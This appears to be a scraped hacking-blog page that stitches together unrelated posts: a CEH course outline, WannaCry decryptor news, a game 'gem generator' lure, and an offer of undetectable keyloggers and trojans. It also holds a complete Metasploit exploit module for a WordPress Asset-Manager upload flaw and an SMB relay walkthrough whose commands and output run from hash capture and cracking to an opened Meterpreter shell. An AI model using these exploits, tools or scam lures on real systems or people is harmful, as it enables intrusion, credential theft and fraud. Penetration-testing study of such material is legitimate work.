Free EC-Council Certified Ethical Hacker (C|EH) V10 Course
In the year of Great Recession 2009 we started CEH and covered all topics and tools. This year at hackguide4u we are about to start CEH v10. In this new course we will explore the fundamental concepts of system vulnerability assessment and penetration testing. After completing this course and practicing anyone can take the CEH v10 certification exam in the near future and we at hackguide4u are not stopping at CEH only, we will also cover EC-Council's Specialist, Advance and Management courses as well.
By following EC-Council's official curriculum, this course is arranged according to five phases of hacking:
1- Reconnaissance
2- Scanning
3- Gaining Access
4- Maintaining Access
5- Covering Tracks
Almost all our readers are familiar with these terms and we will learn them again.
Video Labs will cover each topic and their tools in detail:
Footprinting and Reconnaissance
Scanning Network
Enumeration
Gaining Access
Vulnerability Analysis
System Hacking
Malware Threats
Sniffing
Social Engineering
Denial of Service
Session Hijacking
Evading IDS Firewalls and Honeypots
Accessing Networks and Applications
Hacking Web Servers
Hacking Web Applications
SQL Injection
Hacking Wireless Networks
Hacking Mobile Platforms
Cloud Computing
Cryptography
Maintaining Access
Covering Your Tracks
Lastly, welcome to Certified Ethical Hacking v10! I cannot wait to begin the course with such Enthusiasm and eager scholars.

Hack WPA2-PSK clients with Key Re-installation Attacks
- Arch Linux: WPA Supplicant patch, Hostapd patch
- Aruba
- Debian/Ubuntu
- Microsoft
- Mikrotik
- Netgear: WAC120, WAC505/WAC510, WAC720/730, WN604, WNAP210v2, WNAP320, WNDAP350, WNDAP620, WNDAP660, WND930
- Ubiquiti

WannaCry Ransomware | Solution | Fix
Since the WannaCry ransomware ripped through the internet in May 2017, infecting hundreds of thousands of machines and locking up critical systems from health care to transportation, cryptographers have searched for a cure. Finding a flaw in WannaCry’s encryption scheme, after all, could decrypt all those systems without any ransom.
Now one French researcher says he’s found at least a hint of a very limited remedy. The fix still seems too buggy, and far from the panacea WannaCry victims have hoped for. But if Adrien Guinet’s claims hold up, his tool could unlock some infected computers running Windows XP, the aging, largely unsupported version of Microsoft’s operating system, which analysts believe accounts for some portion of the WannaCry plague.
"Does not erase the prime numbers from memory before freeing the associated memory," says Guinet.Based on this finding, Guinet released a WannaCry ransomware decryption tool, named WannaKey
"It does so by searching for them in the wcry.exe process. This is the process that generates the RSA private key. The main issue is that the CryptDestroyKey and CryptReleaseContext does not erase the prime numbers from memory before freeing the associated memory." says Guinet
So, that means, this method will work only if:
- The affected computer has not been rebooted after being infected.
- The associated memory has not been allocated and erased by some other process.
"In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!," Guinet says.
Download Tool here @ https://github.com/gentilkiwi/wanakiwi/releases

Hack Clash of Clans , Coins, elixir, Gems,
To generate onlineClick Here

Sharing my Penetration Testing Tools with Source
Tool categories are:
webscanner, smtp scanner, ipv6 scanner, android trojans, stealth keyloggers, stealth remote control software undetectable by AV, vpn scanner, dns scanner, inside out tools to fetch data within protected environments, tunneling tools, penetration checklists etc. etc. etc.
All of them have never been published before. I will release them one after the other including source code. Most of them are really easy to use. I started uploading them to code.google.
Here are some of the first uploads:
dns-information-gathering-tool - This tool do an information gathering based on a domain name. - Google Project Hosting
android-security-demo-app - app and webserver to demonstrate how to control a remote phone via webserver - Google Project Hosting
ipv6-portable-portscanner - windows standalone portable portscanner ipv6 - Google Project Hosting
smtp-security-scanner - This tool identifies various vulnerabilities on a remote SMTP server (testing the remote SMTP deamon as well as external DB's). - Google Project Hosting
swat-web-security-scanner - windows scanner to identify sensitives web server files, methods etc. - Google Project Hosting
The more sophisticated (and dangerous ones) will come later....
oli.muenchow

WordPress Asset-Manager PHP File Upload Vulnerability
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/php_exe'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
plugin. By abusing the upload.php file, a malicious user can upload a file to a
temp directory without authentication, which results in arbitrary code execution.
},
'Author' =>
[
'Sammy FORGIT', # initial discovery
'James Fitts
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '82653' ],
[ 'BID', '53809' ],
[ 'EDB', '18993' ],
[ 'URL',
'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html'
]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 26 2012'))
register_options(
[
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
], self.class)
end
def exploit
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
payload_name = "#{rand_text_alpha(5)}.php"
php_payload = get_write_exec_payload(:unlink_self=>true)
data = Rex::MIME::Message.new
data.add_part(php_payload, "application/octet-stream", nil,
"form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{peer} - Uploading payload #{payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if not res or res.code != 200 or res.body !~ /#{payload_name}/
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload #{payload_name}")
res = send_request_raw({
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
'method' => 'GET'
})
if res and res.code != 200
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
end
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. hackguide4u nor Adnan accepts
//responsibility for any damage caused by the use or misuse of
//this informationBY BOT24

Executing SMB Relay Attacks via SQL Server using Metasploit
In this blog, I’ll provide a brief overview of SMB Relay attacks and
show how they can be initiated through a Microsoft SQL Server. I will
also provide some practical examples that show how to use new Metasploit
modules to gain unauthorized access to SQL Servers during a penetration
test. Below is a summary of what will be covered in this blog:
- A Brief History of SMB Relay
- Using SQL Server to Iniate SMB Authentication Attacks
- Using Metasploit Modules to Capture and Crack Hashes
- Using Metasploit Modules to Relay Authentication
A Brief History of SMB Relay
In summary, an SMB Relay attack can be loosely defined as the process of relaying SMB authentication from one system to another via a man-in-the-middle (MITM) position. Based on my five whole minutes of wiki research I now know that the issues that allow smb attacks to be succesful were identified as a threat in the late 90’s. However, it wasn’t until 2001 that Sir Dystic publicly released a tool that could be used to perform practical attacks. Seven years later Microsoft got around to partially fixing the issue with a patch, but it only prevents attackers from relaying back to the originating system.I guess the good news is that SMB relay attacks can be prevented by enabling and requiring smb message signing, but the bad news is that most environments are configured in such a way that attackers can still relay authentication to other systems.
2001 was a while ago, so I got out my calculator and did some hardcore math to figure out that this has been a well known and practiced attack for at least 11 years. During that time there have been many tools and projects dedicated to taking advantage of the attack technique. Some of the more popular ones include Metasploit, Squirtle, and ZackAttack.
Anyway, let’s get back on track…
Using SQL Server to Initiate SMB Authentication Attacks
So how can we initiate SMB authentication through a SQL Server? As it turns out, SQL Server can interact with the file system in a number of different ways. For example, it supports functions for reading from files, providing directory listings, and checking if files exist. The xp_dirtree and xp_fileexist stored procedures are especially handy, because by default they can be executed by any login with the PUBLIC role in SQL Server 2000 to 2012.How does this help us? Both the xp_dirtree and xp_fileexist stored procedures can support more then just local drives. They also support remote UNC paths (\\server\file). Also, everytime the SQL Server attempts to access a remote file server via a UNC path it automatically attempts to authenticate to it with the SQL Server service account.
The normal authentication process that would occur when a SQL Server accesses a remote file share via a UNC path looks something like the diagram below:
In most enterprise environments the SQL Server service is configured with a domain account. What that means is an attacker could execute one of the prelisted stored procedures via SQL injection (or a valid SQL login) and relay the authentication to another database server to obtain a shell. Alternatively, an attacker could simply capture and crack the hashes offline. However, it should be noted that the SQL Server service can be configured with a number of different accounts. Below is a table showing the basic account configuration options and potential attacks.
Service Account |
Network Communication |
SMB Capture |
SMB Relay |
NetworkService | Computer Account | Yes | No |
Local Administrator | Local Administrator | Yes | Yes |
Domain User | Domain User | Yes | Yes |
Domain Admin | Domain Admin | Yes | Yes |
Using Metasploit Modules to Capture and Crack Hashes
So now that you understand how the basics work, let’s walk through how to initate SMB authentication through SQL server with the intent of gathering and cracking credentials for later use. In the diagram below, I’ve tried to illustrate what it would look like if an attacker initiated a connection from the SQL server to their evil server and captured hashes using a static nonce.The attack scenario above can be automated using the “auxiliary/server/capture/smb” and “auxiliary/admin/mssql/mssql_ntlm_stealer” Metasploit modules. Below is a step by step example of how to capture and crack the credentials using those modules.
Systems for the scenario:
- SQL Server 1: 192.168.1.100
- Attacker System: 192.168.1.102
- Start the Metasploit “smb” capture module to grab password hashes on the attacker’s system:
msfconsole use auxiliary/server/capture/smb set CAINPWFILE /cain_hashes.txt set JOHNPWFILE /john_hashes.txt exploit
- Execute the “mssql_ntlm_stealer” metasploit module to initiate SMB authentication via SQL Server 1 using domain credententials:
msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN DEMO set USERNAME test set PASSWORD Password12 set RHOST 192.168.1.100 set RPORT 1433 Set SMBPROXY 192.168.1.102 msf auxiliary(mssql_ntlm_stealer) > run [*] DONT FORGET to run a SMB capture or relay module! [*] Forcing SQL Server at 192.168.1.100 to auth to 192.168.1.102 via xp_dirtree... [*] SMB Captured - 2012-11-26 10:45:35 -0600 NTLMv1 Response Captured from 192.168.1.100:1051 - 192.168.1.100 USER:sqlaccount DOMAIN:LVA OS:Windows Server 2003 3790 Service Pack 2 LM: LMHASH:b0b6932dae11731fc8ddf907024858f89fd700cd9fb72170 NTHASH:c180596a2d116a3c70c329de3a7b097c15fb75cb07822d08 [+] Successfully executed xp_dirtree on 192.168.1.100 [+] Go check your SMB relay or capture module for goodies! [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
- Crack the first 16 characters of the recovered LANMAN hash with
rcracki and a seeded half LM Rainbow Tables. Both can be downloaded from
http://www.project-rainbowcrack.com.
C:\>rcracki_mt -h b0b6932dae11731f ./halflmchall Using 1 threads for pre-calculation and false alarm checking... Found 4 rainbowtable files... halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti: reading index... 13528977 bytes read, disk access time: 0.14 s reading table... 461190920 bytes read, disk access time: 4.55 s searching for 1 hash... plaintext of b0b6932dae11731f is WINTER2 cryptanalysis time: 0.96 s statistics ------------------------------------------------------- plaintext found: 1 of 1 (100.00%) total disk access time: 4.68 s total cryptanalysis time: 0.96 s total pre-calculation time: 2.07 s total chain walk step: 2876401 total false alarm: 1215 total chain walk step due to false alarm: 1299561 result ------------------------------------------------------- b0b6932dae11731f WINTER2 hex:57494e54455232
- Crack the second half with john the ripper to obtain the case
insensitive full LM password. Use the netntlm.pl script from the jumbo
pack. They can be downloaded from http://www.openwall.com/john/.
C:\>perl netntlm.pl --seed WINTER2 --file john_hashes.txt …[TRUNCATED]… Loaded 1 password hash (LM C/R DES [netlm]) WINTER2012 (sqlaccount) guesses: 1 time: 0:00:00:10 DONE (Mon Nov 26 10:59:56 2012) c/s: 428962 trying: WINTER204K - WINTER211IA …[TRUNCATED]…
- Run the same command again to obtain the case sensitve password.
C:\>perl netntlm.pl --seed WINTER2 --file john_hashes.txt …[TRUNCATED]… Performing NTLM case-sensitive crack for account: sqlaccount. guesses: 1 time: 0:00:00:00 DONE (Mon Nov 26 11:01:54 2012) c/s: 1454 trying: WINTER2012 - winter2012 Use the "--show" option to display all of the cracked passwords reliably Loaded 1 password hash (NTLMv1 C/R MD4 DES [ESS MD5] [netntlm]) Winter2012 (sqlaccount) …[TRUCATED]…
Using Metasploit Modules to Relay SMB Authentication
Ok, now for the classic relay example. Below is basic diagram showing how an attacker would be able to leverage a shared SQL Server service acccount being used by two SQL servers. All that’s required is a SQL injection or a SQL login that has the PUBLIC role.Now that we have covered the visual, let’s walkthrough the practical attack using the mssql_ntlm_stealer module. This can be used during penetration tests to obtain a meterpreter session on SQL Servers that are using a shared service account.
Systems for the scenario:
- SQL Server 1: 192.168.1.100
- SQL Server 2: 192.168.1.101
- Attacker System: 192.168.1.102
- Start the Metasploit “smb_relay” module to relay authentication to SQL Server 2:
msfconsole use exploit/windows/smb/smb_relay set SMBHOST 192.168.1.101 exploit
- Configure and execute the “mssql_ntlm_stealer” Metasploit module against SQL Server 1:
msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN DEMO set USERNAME test set PASSWORD Password12 set RHOST 192.168.1.100 set RPORT 1433 Set SMBPROXY 192.168.1.102 msf auxiliary(mssql_ntlm_stealer) > run [*] DONT FORGET to run a SMB capture or relay module! [*] Forcing SQL Server at 192.168.1.100 to auth to 192.168.1.102 via xp_dirtree... [*] Received 192.168.1.100:1058 LVA\sqlaccount LMHASH:feefee989 c0b45f833b7635f0d2ffd667f4bd0019c952d5a NTHASH:8f3e0be3190fee6b d17b793df4ace8f96e59d324723fcc95 OS:Windows Server 2003 3790 Service Pack 2 LM: [*] Authenticating to 192.168.1.101 as LVA\sqlaccount... [*] AUTHENTICATED as LVA\sqlaccount... [*] Connecting to the ADMIN$ share... [*] Regenerating the payload... [*] Uploading payload... [*] Created \saEQcXca.exe... [*] Connecting to the Service Control Manager... [*] Obtaining a service manager handle... [*] Creating a new service... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Sending stage (752128 bytes) to 192.168.1.101 [*] Closing service handle... [*] Deleting \saEQcXca.exe... [*] Sending Access Denied to 192.168.1.100:1058 LVA\sqlaccount [+] Successfully executed xp_dirtree on 192.168.1.100 [+] Go check your SMB relay or capture module for goodies! [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mssql_ntlm_stealer) > [*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.101:1059) at 2012-11-26 11:54:18 -0600
Wrap Up
I would like to make it clear that none of these are original ideas. Techniques for initiating SMB relay attacks through SQL injection on database platforms like SQL Server have been around a long time. My hope is that the Metasploit modules can be used during penetration tests to help generate more awareness. To those out there trying to do a little good with a little bad – have fun and hack responsibly!BY Scott Sutherland

SQL Fingerprint Xmas Released
Microsoft SQL Server fingerprinting can be a time
consuming process, because it involves trial and error methods to
determine the exact version. Intentionally inserting an invalid input to
obtain a typical error message or using certain alphabets that are
unique for certain server are two of the many ways to possibly determine
the version, but most of them require authentication, permissions
and/or privileges on Microsoft SQL Server to succeed.
Instead, ESF.pl uses a combination of crafted packets for SQL Server Resolution Protocol (SSRP) and Tabular Data Stream Protocol (TDS) (protocols natively used by Microsoft SQL Server) to accurately perform version fingerprinting and determine the exact Microsoft SQL Server version. ESF.pl also applies a sophisticated Scoring Algorithm Mechanism (Powered by Exploit Next Generation++ Technology), which is a much more reliable technique to determine the Microsoft SQL Server version. It is a tool intended to be used by:
This version is a completely rewritten version in Perl, making ESF.pl much more
portable than the previous binary version (Win32), and its original purpose is
to be used as a tool to perform automated penetration test. This version also includes the followingMicrosoft SQL Server versions to its fingerprint
database: • Microsoft SQL Server 2012 SP1 (CU1) • Microsoft SQL Server 2012 SP1 • Microsoft SQL Server 2012 SP1 CTP4 • Microsoft SQL Server 2012 SP1 CTP3 • Microsoft SQL Server 2012 SP0 (CU4) • Microsoft SQL Server 2012 SP0 (MS12-070) • Microsoft SQL Server 2012 SP0 (CU3) • Microsoft SQL Server 2012 SP0 (CU2) • Microsoft SQL Server 2012 SP0 (CU1) • Microsoft SQL Server 2012 SP0 (MS12-070) • Microsoft SQL Server 2012 SP0 (KB2685308) • Microsoft SQL Server 2012 RTM
Download: http://code.google.com
Source: http://code.google.com/p/sql-fingerprint-next-generation
